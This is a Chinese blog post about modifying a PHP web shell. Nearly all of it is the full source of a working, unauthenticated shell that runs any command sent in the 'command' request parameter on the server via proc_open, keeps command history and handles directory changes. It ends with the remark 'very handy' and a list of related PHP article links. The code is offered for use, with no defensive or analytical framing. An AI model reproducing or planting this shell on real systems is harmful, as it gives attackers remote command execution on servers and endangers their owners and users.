[置顶] 改一个PHP WEB SHELL
2016-08-25 17:02
204 查看
<?php define("WINDOWS",1) ; function GBK2UTF8($text=null){ if (!empty($text) && function_exists('iconv')){ return iconv("GBK", "UTF-8", $text); } return $text ; } function remove_blanklines($str){ return $str ? preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", trim($str)): '' ; } class Webshell { private $default_settings = null ; function __init__(){ $this->default_settings = array('home-directory' => '.'); $_SESSION['cwd'] = realpath($this->default_settings['home-directory']); $_SESSION['history'] = array(); $_SESSION['output'] = ''; } function run(){ if (empty($_SESSION['cwd'])) { $this->__init__(); } $command = $_REQUEST['command'] ; if (!empty($command)){ $command = trim($command); $this->_exec($command); } } function _exec($command){ if (!empty($command)) { if (($i = array_search($command, $_SESSION['history'])) !== false) unset($_SESSION['history'][$i]); array_unshift($_SESSION['history'], $command); $_SESSION['output'] .= (empty($_SESSION['output'])?'':"\n\n") . "$ {$command}\n" ; /* Initialize the current working directory. */ if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) { $_SESSION['cwd'] = realpath($this->default_settings['home-directory']); } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { /* The current command is a 'cd' command which we have to handle * as an internal shell command. */ if ($regs[1]{0} == '/') { /* Absolute path, we use it unchanged. */ $new_dir = $regs[1]; } else { /* Relative path, we append it to the current working * directory. */ $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; } /* Transform '/./' into '/' */ while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); /* Transform '//' into '/' */ while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); /* Transform 'x/..' into '' */ while (preg_match('|/\.\.(?!\.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if ($new_dir == '') $new_dir = '/'; /* Try to change directory. */ if (@chdir($new_dir)) { $_SESSION['cwd'] = $new_dir; } else { $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; } } else { // We canot use putenv() in safe mode. if (!ini_get('safe_mode')) { // Advice programs (ls for example) of the terminal size. putenv('ROWS=' . 80); putenv('COLUMNS=' . 600); } $shell_result = '' ; $io = array(); $p = proc_open($command,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io,$_SESSION['cwd']); /* Read output sent to stdout. */ while (!feof($io[1])) { $shell_result .= htmlspecialchars(fgets($io[1])); } /* Read output sent to stderr. */ while (!feof($io[2])) { $shell_result .= htmlspecialchars(fgets($io[2])); } fclose($io[1]); fclose($io[2]); proc_close($p); $shell_result = (WINDOWS)? GBK2UTF8($shell_result):$shell_result; $shell_result = remove_blanklines($shell_result); $_SESSION['output'] .= $shell_result; } } /* Build the command history for use in the JavaScript */ if (empty($_SESSION['history'])) { $js_command_hist = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; } echo "<PRE>{$_SESSION['output']}</PRE>" ; } } $inst = new Webshell(); $inst->run();
很好用
大小: 29.3 KB
大小: 29.7 KB
查看图片附件
相关文章推荐
- [置顶] 使用php和阶乘原理 通过阶乘获取一个一维数组中全部的组合情况
- [置顶] 【实战】如何通过html+css+mysql+php来快速的制作动态网页(以制作一个博客网站为列)
- 一个菜单效果 http://www.51js.com/viewthread.php?tid=1560&highlight=%CA%F7
- 我的php的一个数据库的操纵类
- Apache的一个错误:[error] an unknown filter was not added: PHP
- PHP Web Shell v1.0.1 Released!
- 一个得到客户端IP的函数(PHP)
- 一个 Javascript 的日历 (PHP 文件, 带农历参数) by Emerald 绿色学院 - Green Institute
- 一个php的二级联动,无刷新,从数据库中调入类别
- 用PHP开发GUI(一个简单的例子)
- php连mysql的一个简单类
- php初探: 一个简单的mysql数据库分页的程序模板
- 用PHP写了一个SQLite的数据库驱动类,测试中....
- PHP基于MVC架构的一个设计
- 从php3升级到php4出现的一个参数传递问题
- 今天发现一个好网站 http://www.phpv.net/
- PHP翻页的一个类
- 一个生成RSS2.0的php类(转载)
- 今天我感冒了,但是却还要完成一个flash PHP+MYSQL整站程序
- 用PHP构建一个留言本